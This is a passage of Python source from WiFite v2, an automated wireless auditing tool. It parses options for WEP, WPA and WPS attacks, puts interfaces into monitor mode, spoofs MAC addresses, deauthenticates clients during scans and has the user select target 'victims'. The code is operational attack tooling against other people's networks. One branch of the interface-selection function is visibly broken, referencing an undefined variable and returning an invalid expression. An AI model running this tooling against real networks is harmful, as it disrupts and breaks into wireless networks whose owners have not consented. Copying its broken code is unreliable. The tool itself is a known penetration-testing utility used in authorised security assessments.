else: print GR+' [+]'+W+' minimum WPS tries/attempts threshold set to %s' % (G+args[i] + ""+W)
if args[i] == '-wpsmaxr' or args[i] == '-wpsretry':
i += 1
try:
WPS_MAX_RETRIES = int(args[i])
except ValueError: print R+' [!]'+O+' invalid number: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no number given!'+W
else: print GR+' [+]'+W+' WPS maximum retries set to %s' % (G+args[i] + " retries"+W)
except IndexError:
print '\nindexerror\n\n'
if capfile != '':
analyze_capfile(capfile)
print ''
def banner():
"""
Displays ASCII art of the highest caliber.
"""
global REVISION
print ''
print G+" .;' `;, "
print G+" .;' ,;' `;, `;, "+W+"WiFite v2 (r" + str(REVISION) + ")"
print G+".;' ,;' ,;' `;, `;, `;, "
print G+":: :: : "+GR+"( )"+G+" : :: :: "+GR+"automated wireless auditor"
print G+"':. ':. ':. "+GR+"/_\\"+G+" ,:' ,:' ,:' "
print G+" ':. ':. "+GR+"/___\\"+G+" ,:' ,:' "+GR+"designed for Linux"
print G+" ':. "+GR+"/_____\\"+G+" ,:' "
print G+" "+GR+"/ \\"+G+" "
print W
def upgrade():
"""
Checks for new version, prompts to upgrade, then
replaces this script with the latest from the repo
"""
global REVISION
try:
print GR+' [!]'+W+' upgrading requires an '+G+'internet connection'+W
print GR+' [+]'+W+' checking for latest version...'
(revision, description, date_changed) = get_revision()
if revision == -1:
print R+' [!]'+O+' unable to access googlecode'+W
elif revision > REVISION:
print GR+' [!]'+W+' a new version is '+G+'available!'+W
print GR+' [-]'+W+' revision: '+G+str(revision)+W
print GR+' [-]'+W+' description: '+G+description+W
print GR+' [-]'+W+' date added: '+G+date_changed+W
response = raw_input(GR+' [+]'+W+' do you want to upgrade to the latest version? (y/n): ')
if not response.lower().startswith('y'):
print GR+' [-]'+W+' upgrading '+O+'aborted'+W
exit_gracefully(0)
return
# Download script, replace with this one
print GR+' [+] '+G+'downloading'+W+' update...'
try:
sock = urllib.urlopen('http://wifite.googlecode.com/svn/trunk/wifite.py')
page = sock.read()
except IOError:
page = ''
if page == '':
print R+' [+] '+O+'unable to download latest version'+W
exit_gracefully(1)
# Create/save the new script
f=open('wifite_new.py','w')
f.write(page)
f.close()
# The filename of the running script
this_file = __file__
if this_file.startswith('./'):
this_file = this_file[2:]
# create/save a shell script that replaces this script with the new one
f = open('update_wifite.sh','w')
f.write('''#!/bin/sh\n
rm -rf ''' + this_file + '''\n
mv wifite_new.py ''' + this_file + '''\n
rm -rf update_wifite.sh\n
chmod +x ''' + this_file + '''\n
''')
f.close()
# Change permissions on the script
returncode = call(['chmod','+x','update_wifite.sh'])
if returncode != 0:
print R+' [!]'+O+' permission change returned unexpected code: '+str(returncode)+W
exit_gracefully(1)
# Run the script
returncode = call(['sh','update_wifite.sh'])
if returncode != 0:
print R+' [!]'+O+' upgrade script returned unexpected code: '+str(returncode)+W
exit_gracefully(1)
print GR+' [+] '+G+'updated!'+W+' type "./' + this_file + '" to run again'
else:
print GR+' [-]'+W+' your copy of wifite is '+G+'up to date'+W
except KeyboardInterrupt:
print R+'\n (^C)'+O+' wifite upgrade interrupted'+W
exit_gracefully(0)
def get_revision():
"""
Gets latest revision # from google code repository
Returns tuple: revision#, description of change, date changed
"""
irev =-1
desc =''
since=''
try:
sock = urllib.urlopen('http://code.google.com/p/wifite/source/list?path=/trunk/wifite.py')
page = sock.read()
except IOError:
return (-1, '', '')
# get the revision
start= page.find('href="detail?r=')
stop = page.find('&', start)
if start != -1 and stop != -1:
start += 15
rev=page[start:stop]
try:
irev=int(rev)
except ValueError:
rev=rev.split('\n')[0]
print R+'[+] invalid revision number: "'+rev+'"'
# get the description
start= page.find(' href="detail?r='+str(irev)+'', start + 3)
start= page.find('">',start)
stop = page.find('</a>', start)
if start != -1 and stop != -1:
start += 2
desc=page[start:stop].strip()
desc=desc.replace("'","'")
desc=desc.replace("<","<")
desc=desc.replace(">",">")
if '\n' in desc:
desc = desc.split('\n')[0]
# get the time last modified
start= page.find(' href="detail?r='+str(irev)+'', start + 3)
start= page.find('">',start)
stop = page.find('</a>', start)
if start != -1 and stop != -1:
start += 2
since=page[start:stop]
return (irev, desc, since)
def help():
"""
Prints help screen
"""
head = W
sw = G
var = GR
des = W
de = G
print head+' COMMANDS'+W
print sw+'\t-check '+var+'<file>\t'+des+'check capfile '+var+'<file>'+des+' for handshakes.'+W
print sw+'\t-cracked \t'+des+'display previously-cracked access points'+W
print ''
print head+' GLOBAL'+W
print sw+'\t-all \t'+des+'attack all targets. '+de+'[off]'+W
print sw+'\t-i '+var+'<iface> \t'+des+'wireless interface for capturing '+de+'[auto]'+W
print sw+'\t-mac \t'+des+'anonymize mac address '+de+'[off]'+W
print sw+'\t-c '+var+'<channel>\t'+des+'channel to scan for targets '+de+'[auto]'+W
print sw+'\t-e '+var+'<essid> \t'+des+'target a specific access point by ssid (name) '+de+'[ask]'+W
print sw+'\t-b '+var+'<bssid> \t'+des+'target a specific access point by bssid (mac) '+de+'[auto]'+W
print sw+'\t-showb \t'+des+'display target BSSIDs after scan '+de+'[off]'+W
print sw+'\t-pow '+var+'<db> \t'+des+'attacks any targets with signal strenghth > '+var+'db '+de+'[0]'+W
print sw+'\t-quiet \t'+des+'do not print list of APs during scan '+de+'[off]'+W
print ''
print head+'\n WPA'+W
print sw+'\t-wpa \t'+des+'only target WPA networks (works with -wps -wep) '+de+'[off]'+W
print sw+'\t-wpat '+var+'<sec> \t'+des+'time to wait for WPA attack to complete (seconds) '+de+'[500]'+W
print sw+'\t-wpadt '+var+'<sec> \t'+des+'time to wait between sending deauth packets (sec) '+de+'[10]'+W
print sw+'\t-strip \t'+des+'strip handshake using tshark or pyrit '+de+'[off]'+W
print sw+'\t-crack '+var+'<dic>\t'+des+'crack WPA handshakes using '+var+'<dic>'+des+' wordlist file '+de+'[off]'+W
print sw+'\t-dict '+var+'<file>\t'+des+'specify dictionary to use when cracking WPA '+de+'[phpbb.txt]'+W
print sw+'\t-aircrack \t'+des+'verify handshake using aircrack '+de+'[on]'+W
print sw+'\t-pyrit \t'+des+'verify handshake using pyrit '+de+'[off]'+W
print sw+'\t-tshark \t'+des+'verify handshake using tshark '+de+'[on]'+W
print sw+'\t-cowpatty \t'+des+'verify handshake using cowpatty '+de+'[off]'+W
print head+'\n WEP'+W
print sw+'\t-wep \t'+des+'only target WEP networks '+de+'[off]'+W
print sw+'\t-pps '+var+'<num> \t'+des+'set the number of packets per second to inject '+de+'[600]'+W
print sw+'\t-wept '+var+'<sec> \t'+des+'sec to wait for each attack, 0 implies endless '+de+'[600]'+W
print sw+'\t-chopchop \t'+des+'use chopchop attack '+de+'[on]'+W
print sw+'\t-arpreplay \t'+des+'use arpreplay attack '+de+'[on]'+W
print sw+'\t-fragment \t'+des+'use fragmentation attack '+de+'[on]'+W
print sw+'\t-caffelatte \t'+des+'use caffe-latte attack '+de+'[on]'+W
print sw+'\t-p0841 \t'+des+'use -p0841 attack '+de+'[on]'+W
print sw+'\t-hirte \t'+des+'use hirte (cfrag) attack '+de+'[on]'+W
print sw+'\t-nofakeauth \t'+des+'stop attack if fake authentication fails '+de+'[off]'+W
print sw+'\t-wepca '+GR+'<n> \t'+des+'start cracking when number of ivs surpass n '+de+'[10000]'+W
print sw+'\t-wepsave \t'+des+'save a copy of .cap files to this directory '+de+'[off]'+W
print head+'\n WPS'+W
print sw+'\t-wps \t'+des+'only target WPS networks '+de+'[off]'+W
print sw+'\t-wpst '+var+'<sec> \t'+des+'max wait for new retry before giving up (0: never) '+de+'[660]'+W
print sw+'\t-wpsratio '+var+'<per>\t'+des+'min ratio of successful PIN attempts/total tries '+de+'[0]'+W
print sw+'\t-wpsretry '+var+'<num>\t'+des+'max number of retries for same PIN before giving up '+de+'[0]'+W
print head+'\n EXAMPLE'+W
print sw+'\t./wifite.py '+W+'-wps -wep -c 6 -pps 600'+W
print ''
###########################
# WIRELESS CARD FUNCTIONS #
###########################
def enable_monitor_mode(iface):
"""
Uses airmon-ng to put a device into Monitor Mode.
Then uses the get_iface() method to retrieve the new interface's name.
Sets global variable IFACE_TO_TAKE_DOWN as well.
Returns the name of the interface in monitor mode.
"""
global IFACE_TO_TAKE_DOWN
print GR+' [+]'+W+' enabling monitor mode on %s...' % (G+iface+W),
stdout.flush()
call(['airmon-ng', 'start', iface], stdout=DN, stderr=DN)
print 'done'
IFACE_TO_TAKE_DOWN = get_iface()
return IFACE_TO_TAKE_DOWN
def disable_monitor_mode():
"""
The program may have enabled monitor mode on a wireless interface.
We want to disable this before we exit, so we will do that.
"""
if IFACE_TO_TAKE_DOWN == '': return
print GR+' [+]'+W+' disabling monitor mode on %s...' % (G+IFACE_TO_TAKE_DOWN+W),
stdout.flush()
call(['airmon-ng', 'stop', IFACE_TO_TAKE_DOWN], stdout=DN, stderr=DN)
print 'done'
PRINTED_SCANNING = False
def get_iface():
"""
Get the wireless interface in monitor mode.
Defaults to only device in monitor mode if found.
Otherwise, enumerates list of possible wifi devices
and asks user to select one to put into monitor mode (if multiple).
Uses airmon-ng to put device in monitor mode if needed.
Returns the name (string) of the interface chosen in monitor mode.
"""
global PRINTED_SCANNING
if not PRINTED_SCANNING:
print GR+' [+]'+W+' scanning for wireless devices...'
PRINTED_SCANNING = True
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
iface = ''
monitors = []
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue
if ord(line[0]) != 32: # Doesn't start with space
iface = line[:line.find(' ')] # is the interface
if line.find('Mode:Monitor') != -1:
monitors.append(iface)
if WIRELESS_IFACE != '':
if monitors.count(WIRELESS_IFACE): return WIRELESS_IFACE
print R+' [!]'+O+' could not find wireless interface %s' % ('"'+R+WIRELESS_IFACE+O+'"'+W)
if len(monitors) == 1:
return monitors[0] # Default to only device in monitor mode
elif len(monitors) > 1:
print GR+" [+]"+W+" interfaces in "+G+"monitor mode:"+W
for i, monitor in enumerate(monitors):
print " %s. %s" % (G+str(i+1)+W, G+monitor+W)
ri = raw_input("%s [+]%s select %snumber%s of interface to use for capturing (%s1-%d%s): %s" % \
(GR, W, G, W, G, len(monitors), W, G))
while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
ri = raw_input("%s [+]%s select number of interface to use for capturing (%s1-%d%s): %s" % \
(GR, W, G, len(monitors), W, G))
i = int(ri)
return monitors[i - 1]
proc = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if len(line) == 0 or line.startswith('Interface'): continue
#monitors.append(line[:line.find('\t')])
monitors.append(line)
if len(monitors) == 0:
print R+' [!]'+O+" no wireless interfaces were found."+W
print R+' [!]'+O+" you need to plug in a wifi device or install drivers.\n"+W
exit_gracefully(0)
elif WIRELESS_IFACE != '' and monitors.count(WIRELESS_IFACE) > 0:
mac_anonymize(monitor)
return enable_monitor-mode
elif len(monitors) == 1:
monitor = monitors[0][:monitors[0].find('\t')]
mac_anonymize(monitor)
return enable_monitor_mode(monitor)
print GR+" [+]"+W+" available wireless devices:"
for i, monitor in enumerate(monitors):
print " %s%d%s. %s" % (G, i + 1, W, monitor)
ri = raw_input(GR+" [+]"+W+" select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
ri = raw_input(" [+] select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
i = int(ri)
monitor = monitors[i-1][:monitors[i-1].find('\t')]
mac_anonymize(monitor)
return enable_monitor_mode(monitor)
######################
# SCANNING FUNCTIONS #
######################
def scan(channel=0, iface='', tried_rtl8187_fix=False):
"""
Scans for access points. Asks user to select target(s).
"channel" - the channel to scan on, 0 scans all channels.
"iface" - the interface to scan on. must be a real interface.
"tried_rtl8187_fix" - We have already attempted to fix "Unknown error 132"
Returns list of selected targets and list of clients.
"""
remove_airodump_files(temp + 'wifite')
command = ['airodump-ng',
'-a', # only show associated clients
'-w', temp + 'wifite'] # output file
if channel != 0:
command.append('-c')
command.append(str(channel))
command.append(iface)
proc = Popen(command, stdout=DN, stderr=DN)
time_started = time.time()
print GR+' [+] '+G+'initializing scan'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.'
(targets, clients) = ([], [])
try:
deauth_sent = 0.0
old_targets = []
stop_scanning = False
while True:
time.sleep(0.3)
if not os.path.exists(temp + 'wifite-01.csv') and time.time() - time_started > 1.0:
print R+'\n [!] ERROR!'+W
# RTL8187 Unknown Error 132 FIX
if proc.poll() != None: # Check if process has finished
proc = Popen(['airodump-ng', iface], stdout=DN, stderr=PIPE)
if not tried_rtl8187_fix and proc.communicate()[1].find('failed: Unknown error 132') != -1:
if rtl8187_fix(iface):
return scan(channel=channel, iface=iface, tried_rtl8187_fix=True)
print R+' [!]'+O+' wifite is unable to generate airodump-ng output files'+W
print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
exit_gracefully(1)
(targets, clients) = parse_csv(temp + 'wifite-01.csv')
# If we are targeting a specific ESSID/BSSID, skip the scan once we find it.
if TARGET_ESSID != '':
for t in targets:
if t.ssid.lower() == TARGET_ESSID.lower():
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
targets = [t]
stop_scanning = True
break
if TARGET_BSSID != '':
for t in targets:
if t.bssid.lower() == TARGET_BSSID.lower():
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
targets = [t]
stop_scanning = True
break
# If user has chosen to target all access points, wait 20 seconds, then return all
if ATTACK_ALL_TARGETS and time.time() - time_started > 10:
print GR+'\n [+]'+W+' auto-targeted %s%d%s access point%s' % (G, len(targets), W, '' if len(targets) == 1 else 's')
stop_scanning = True
if ATTACK_MIN_POWER > 0 and time.time() - time_started > 10:
# Remove targets with power < threshold
i = 0
before_count = len(targets)
while i < len(targets):
if targets[i].power < ATTACK_MIN_POWER:
targets.pop(i)
else: i += 1
print GR+'\n [+]'+W+' removed %s targets with power < %ddB, %s remain' % \
(G+str(before_count - len(targets))+W, ATTACK_MIN_POWER, G+str(len(targets))+W)
stop_scanning = True
if stop_scanning: break
# If there are unknown SSIDs, send deauths to them.
if channel != 0 and time.time() - deauth_sent > 5:
deauth_sent = time.time()
for t in targets:
if t.ssid == '':
print "\r %s deauthing hidden access point (%s) \r" % \
(GR+sec_to_hms(time.time() - time_started)+W, G+t.bssid+W),
stdout.flush()
# Time to deauth
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', t.bssid]
for c in clients:
if c.station == t.bssid:
cmd.append('-c')
cmd.append(c.bssid)
break
cmd.append(iface)
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
proc_aireplay.wait()
time.sleep(0.5)
else:
for ot in old_targets:
if ot.ssid == '' and ot.bssid == t.bssid:
print '\r %s successfully decloaked "%s" ' % \
(GR+sec_to_hms(time.time() - time_started)+W, G+t.ssid+W)
old_targets = targets[:]
if VERBOSE_APS and len(targets) > 0:
targets = sorted(targets, key=lambda t: t.power, reverse=True)
if not WPS_DISABLE:
wps_check_targets(targets, temp + 'wifite-01.cap', verbose=False)
os.system('clear')
print GR+'\n [+] '+G+'scanning'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.\n'
print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ('BSSID ' if SHOW_MAC_IN_SCAN else '')
print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if SHOW_MAC_IN_SCAN else '')
for i, target in enumerate(targets):
print " %s%2d%s " % (G, i + 1, W),
# SSID
if target.ssid == '':
p = O+'('+target.bssid+')'+GR+' '+W
print '%s' % p.ljust(20),
elif ( target.ssid.count('\x00') == len(target.ssid) ):
p = '<Length '+str(len(target.ssid))+'>'
print '%s' % C+p.ljust(20)+W,
elif len(target.ssid) <= 20:
print "%s" % C+target.ssid.ljust(20)+W,
else:
print "%s" % C+target.ssid[0:17] + '...'+W,
# BSSID
if SHOW_MAC_IN_SCAN:
print O,target.bssid+W,
# Channel
print G+target.channel.rjust(3),W,
# Encryption
if target.encryption.find("WEP") != -1: print G,
else: print O,
print "\b%3s" % target.encryption.strip().ljust(4) + W,
# Power
if target.power >= 55: col = G
elif target.power >= 40: col = O
else: col = R
print "%s%3ddb%s" % (col,target.power, W),
# WPS
if WPS_DISABLE:
print " %3s" % (O+'n/a'+W),
else:
print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
# Clients
client_text = ''
for c in clients:
if c.station == target.bssid:
if client_text == '': client_text = 'client'
elif client_text[-1] != "s": client_text += "s"
if client_text != '': print ' %s' % (G+client_text+W)
else: print ''
print ''
print ' %s %s wireless networks. %s target%s and %s client%s found \r' % (
GR+sec_to_hms(time.time() - time_started)+W, G+'scanning'+W,
G+str(len(targets))+W, '' if len(targets) == 1 else 's',
G+str(len(clients))+W, '' if len(clients) == 1 else 's'),
stdout.flush()
except KeyboardInterrupt:
pass
print ''
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
# Use "wash" program to check for WPS compatibility
if not WPS_DISABLE:
wps_check_targets(targets, temp + 'wifite-01.cap')
remove_airodump_files(temp + 'wifite')
if stop_scanning: return (targets, clients)
print ''
if len(targets) == 0:
print R+' [!]'+O+' no targets found!'+W
print R+' [!]'+O+' you may need to wait for targets to show up.'+W
print ''
exit_gracefully(1)
if VERBOSE_APS: os.system('clear')
# Sort by Power
targets = sorted(targets, key=lambda t: t.power, reverse=True)
victims = []
print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ('BSSID ' if SHOW_MAC_IN_SCAN else '')
print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if SHOW_MAC_IN_SCAN else '')
for i, target in enumerate(targets):
print " %s%2d%s " % (G, i + 1, W),
# SSID
if target.ssid == '':
p = O+'('+target.bssid+')'+GR+' '+W
print '%s' % p.ljust(20),
elif ( target.ssid.count('\x00') == len(target.ssid) ):
p = '<Length '+str(len(target.ssid))+'>'
print '%s' % C+p.ljust(20)+W,
elif len(target.ssid) <= 20:
print "%s" % C+target.ssid.ljust(20)+W,
else:
print "%s" % C+target.ssid[0:17] + '...'+W,
# BSSID
if SHOW_MAC_IN_SCAN:
print O,target.bssid+W,
# Channel
print G+target.channel.rjust(3),W,
# Encryption
if target.encryption.find("WEP") != -1: print G,
else: print O,
print "\b%3s" % target.encryption.strip().ljust(4) + W,
# Power
if target.power >= 55: col = G
elif target.power >= 40: col = O
else: col = R
print "%s%3ddb%s" % (col,target.power, W),
# WPS
if WPS_DISABLE:
print " %3s" % (O+'n/a'+W),
else:
print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
# Clients
client_text = ''
for c in clients:
if c.station == target.bssid:
if client_text == '': client_text = 'client'
elif client_text[-1] != "s": client_text += "s"
if client_text != '': print ' %s' % (G+client_text+W)
else: print ''
ri = raw_input(GR+"\n [+]"+W+" select "+G+"target numbers"+W+" ("+G+"1-%s)" % (str(len(targets))+W) + \
" separated by commas, or '%s': " % (G+'all'+W))
if ri.strip().lower() == 'all':
victims = targets[:]
else:
for r in ri.split(','):
r = r.strip()
if r.find('-') != -1:
(sx, sy) = r.split('-')
if sx.isdigit() and sy.isdigit():
x = int(sx)
y = int(sy) + 1
for v in xrange(x, y):
victims.append(targets[v - 1])
elif not r.isdigit() and r.strip() != '':
print O+" [!]"+R+" not a number: %s " % (O+r+W)
elif r != '':
victims.append(targets[int(r) - 1])
if len(victims) == 0:
print O+'\n [!] '+R+'no targets selected.\n'+W
exit_gracefully(0)
print ''
print ' [+] %s%d%s target%s selected.' % (G, len(victims), W, '' if len(victims) == 1 else 's')
return (victims, clients)
def parse_csv(filename):
"""
Parses given lines from airodump-ng CSV file.
Returns tuple: List of targets and list of clients.
"""
if not os.path.exists(filename): return ([], [])
try:
f = open(filename, 'r')
lines = f.read().split('\n')
f.close()
except IOError: return ([], [])
hit_clients = False
targets = []
clients = []
for line in lines:
if line.startswith('Station MAC,'): hit_clients = True
if line.startswith('BSSID') or line.startswith('Station MAC') or line.strip() == '': continue
if not hit_clients: # Access points
c = line.split(', ', 13)
if len(c) <= 11: continue
cur = 11
c[cur] = c[cur].strip()
if not c[cur].isdigit(): cur += 1
if cur > len(c) - 1: continue
ssid = c[cur+1]
ssidlen = int(c[cur])
ssid = ssid[:ssidlen]
power = int(c[cur-4])
if power < 0: power += 100
enc = c[5]
# Ignore non-WPA/WEP networks.
if enc.find('WPA') == -1 and enc.find('WEP') == -1: continue
if WEP_DISABLE and enc.find('WEP') != -1: continue
if WPA_DISABLE and WPS_DISABLE and enc.find('WPA') != -1: continue
enc = enc.strip()[:4]
t = Target(c[0], power, c[cur-2].strip(), c[3], enc, ssid)
targets.append(t)
else: # Connected clients
c = line.split(', ')
if len(c) < 6: continue
bssid = re.sub(r'[^a-zA-Z0-9:]', '', c[0])
station = re.sub(r'[^a-zA-Z0-9:]', '', c[5])
power = c[3]
if station != 'notassociated':
c = Client(bssid, station, power)
clients.append(c)
return (targets, clients)
def wps_check_targets(targets, cap_file, verbose=True):
"""
Uses reaver's "walsh" (or wash) program to check access points in cap_file
for WPS functionality. Sets "wps" field of targets that match to True.
"""
global WPS_DISABLE
if not program_exists('walsh') and not program_exists('wash'):
WPS_DISABLE = True # Tell 'scan' we were unable to execute walsh
return
program_name = 'walsh' if program_exists('walsh') else 'wash'
if len(targets) == 0 or not os.path.exists(cap_file): return
if verbose:
print GR+' [+]'+W+' checking for '+G+'WPS compatibility'+W+'...',
stdout.flush()
cmd = [program_name,
'-f', cap_file,
'-C'] # ignore Frame Check Sum errors
proc_walsh = Popen(cmd, stdout=PIPE, stderr=DN)
proc_walsh.wait()
for line in proc_walsh.communicate()[0].split('\n'):
if line.strip() == '' or line.startswith('Scanning for'): continue
bssid = line.split(' ')[0]
for t in targets:
if t.bssid.lower() == bssid.lower():
t.wps = True
if verbose:
print 'done'
removed = 0
if not WPS_DISABLE and WPA_DISABLE:
i = 0
while i < len(targets):
if not targets[i].wps and targets[i].encryption.find('WPA') != -1:
removed += 1
targets.pop(i)
else: i += 1
if removed > 0 and verbose: print GR+' [+]'+O+' removed %d non-WPS-enabled targets%s' % (removed, W)
def rtl8187_fix(iface):
"""
Attempts to solve "Unknown error 132" common with RTL8187 devices.
Puts down interface, unloads/reloads driver module, then puts iface back up.
Returns True if fix was attempted, False otherwise.
"""
# Check if current interface is using the RTL8187 chipset
proc_airmon = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
proc_airmon.wait()
using_rtl8187 = False
for line in proc_airmon.communicate()[0].split():
line = line.upper()
if line.strip() == '' or line.startswith('INTERFACE'): continue
if line.find(iface.upper()) and line.find('RTL8187') != -1: using_rtl8187 = True
if not using_rtl8187:
# Display error message and exit
print R+' [!]'+O+' unable to generate airodump-ng CSV file'+W
print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
exit_gracefully(1)
print O+" [!]"+W+" attempting "+O+"RTL8187 'Unknown Error 132'"+W+" fix..."
original_iface = iface
# Take device out of monitor mode
airmon = Popen(['airmon-ng', 'stop', iface], stdout=PIPE, stderr=DN)
airmon.wait()
for line in airmon.communicate()[0].split('\n'):
if line.strip() == '' or \
line.startswith("Interface") or \
line.find('(removed)') != -1:
continue
original_iface = line.split()[0] # line[:line.find('\t')]
# Remove drive modules, block/unblock ifaces, probe new modules.
print_and_exec(['ifconfig', original_iface, 'down'])
print_and_exec(['rmmod', 'rtl8187'])
print_and_exec(['rfkill', 'block', 'all'])
print_and_exec(['rfkill', 'unblock', 'all'])
print_and_exec(['modprobe', 'rtl8187'])
print_and_exec(['ifconfig', original_iface, 'up'])
print_and_exec(['airmon-ng', 'start', original_iface])
print '\r \r',
print O+' [!] '+W+'restarting scan...\n'
return True
def print_and_exec(cmd):
"""
Prints and executes command "cmd". Also waits half a second
Used by rtl8187_fix (for prettiness)
"""
print '\r \r',
stdout.flush()
print O+' [!] '+W+'executing: '+O+' '.join(cmd) + W,
stdout.flush()
call(cmd, stdout=DN, stderr=DN)
time.sleep(0.1)
####################
# HELPER FUNCTIONS #
####################
def remove_airodump_files(prefix):
"""
Removes airodump output files for whatever file prefix ('wpa', 'wep', etc)
Used by wpa_get_handshake() and attack_wep()
"""
remove_file(prefix + '-01.cap')
remove_file(prefix + '-01.csv')
remove_file(prefix + '-01.kismet.csv')
remove_file(prefix + '-01.kismet.netxml')
for filename in os.listdir(temp):
if filename.lower().endswith('.xor'): remove_file(temp + filename)
for filename in os.listdir('.'):
if filename.startswith('replay_') and filename.endswith('.cap'):
remove_file(filename)
if filename.endswith('.xor'): remove_file(filename)
# Remove .cap's from previous attack sessions
"""i = 2
while os.path.exists(temp + 'wep-' + str(i) + '.cap'):
os.remove(temp + 'wep-' + str(i) + '.cap')
i += 1
"""
def remove_file(filename):
"""
Attempts to remove a file. Does not throw error if file is not found.
"""
try: os.remove(filename)
except OSError: pass
def program_exists(program):
"""
Uses 'which' (linux command) to check if a program is installed.
"""
proc = Popen(['which', program], stdout=PIPE, stderr=PIPE)
txt = proc.communicate()
if txt[0].strip() == '' and txt[1].strip() == '':
return False
if txt[0].strip() != '' and txt[1].strip() == '':
return True
return not (txt[1].strip() == '' or txt[1].find('no %s in' % program) != -1)
def sec_to_hms(sec):
"""
Converts integer sec to h:mm:ss format
"""
if sec <= -1: return '[endless]'
h = sec / 3600
sec %= 3600
m = sec / 60
sec %= 60
return '[%d:%02d:%02d]' % (h, m, sec)
def send_interrupt(process):
"""
Sends interrupt signal to process's PID.
"""
try:
os.kill(process.pid, SIGINT)
# os.kill(process.pid, SIGTERM)
except OSError: pass # process cannot be killed
except TypeError: pass # pid is incorrect type
except UnboundLocalError: pass # 'process' is not defined
except AttributeError: pass # Trying to kill "None"
def get_mac_address(iface):
"""
Returns MAC address of "iface".
"""
proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
proc.wait()
mac = ''
first_line = proc.communicate()[0].split('\n')[0]
for word in first_line.split(' '):
if word != '': mac = word
if mac.find('-') != -1: mac = mac.replace('-', ':')
if len(mac) > 17: mac = mac[0:17]
return mac
def generate_random_mac(old_mac):
"""
Generates a random MAC address.
Keeps the same vender (first 6 chars) of the old MAC address (old_mac).
Returns string in format old_mac[0:9] + :XX:XX:XX where X is random hex
"""
random.seed()
new_mac = old_mac[:8].lower().replace('-', ':')
for i in xrange(0, 6):
if i % 2 == 0: new_mac += ':'
new_mac += '0123456789abcdef'[random.randint(0,15)]
# Prevent generating the same MAC address via recursion.
if new_mac == old_mac:
new_mac = generate_random_mac(old_mac)
return new_mac
def mac_anonymize(iface):
"""
Changes MAC address of 'iface' to a random MAC.
Only randomizes the last 6 digits of the MAC, so the vender says the same.
Stores old MAC address and the interface in ORIGINAL_IFACE_MAC
"""
global ORIGINAL_IFACE_MAC
if DO_NOT_CHANGE_MAC: return
if not program_exists('ifconfig'): return
# Store old (current) MAC address
proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
proc.wait()
for word in proc.communicate()[0].split('\n')[0].split(' '):
if word != '': old_mac = word
ORIGINAL_IFACE_MAC = (iface, old_mac)
new_mac = generate_random_mac(old_mac)
call(['ifconfig', iface, 'down'])
print GR+" [+]"+W+" changing %s's MAC from %s to %s..." % (G+iface+W, G+old_mac+W, O+new_mac+W),
stdout.flush()
proc = Popen(['ifconfig', iface, 'hw', 'ether', new_mac], stdout=PIPE, stderr=DN)
proc.wait()
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
print 'done'
def mac_change_back():
"""
Changes MAC address back to what it was before attacks began.
"""
iface = ORIGINAL_IFACE_MAC[0]
old_mac = ORIGINAL_IFACE_MAC[1]
if iface == '' or old_mac == '': return
print GR+" [+]"+W+" changing %s's mac back to %s..." % (G+iface+W, G+old_mac+W),
stdout.flush()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
proc = Popen(['ifconfig', iface, 'hw', 'ether', old_mac], stdout=PIPE, stderr=DN)
proc.wait()
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
print "done"
def analyze_capfile(capfile):
"""
Analyzes given capfile for handshakes using various programs.
Prints results to console.
"""
global TARGET_BSSID, TARGET_ESSID
if TARGET_ESSID == '' and TARGET_BSSID == '':
print R+' [!]'+O+' target ssid and bssid are required to check for handshakes'
print R+' [!]'+O+' please enter essid (access point name) using -e <name>'
print R+' [!]'+O+' and/or target bssid (mac address) using -b <mac>\n'
# exit_gracefully(1)
if TARGET_BSSID == '':
# Get the first BSSID found in tshark!
TARGET_BSSID = get_bssid_from_cap(TARGET_ESSID, capfile)
# if TARGET_BSSID.find('->') != -1: TARGET_BSSID == ''
if TARGET_BSSID == '':
print R+' [!]'+O+' unable to guess BSSID from ESSID!'
else:
print GR+' [+]'+W+' guessed bssid: %s' % (G+TARGET_BSSID+W)
if TARGET_BSSID != '' and TARGET_ESSID == '':
TARGET_ESSID = get_essid_from_cap(TARGET_BSSID, capfile)
print GR+'\n [+]'+W+' checking for handshakes in %s' % (G+capfile+W)
t = Target(TARGET_BSSID, '', '', '', 'WPA', TARGET_ESSID)
if program_exists('pyrit'):
result = has_handshake_pyrit(t, capfile)
print GR+' [+]'+W+' '+G+'pyrit'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: pyrit'
if program_exists('cowpatty'):
result = has_handshake_cowpatty(t, capfile, nonstrict=True)
print GR+' [+]'+W+' '+G+'cowpatty'+W+' (nonstrict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
result = has_handshake_cowpatty(t, capfile, nonstrict=False)
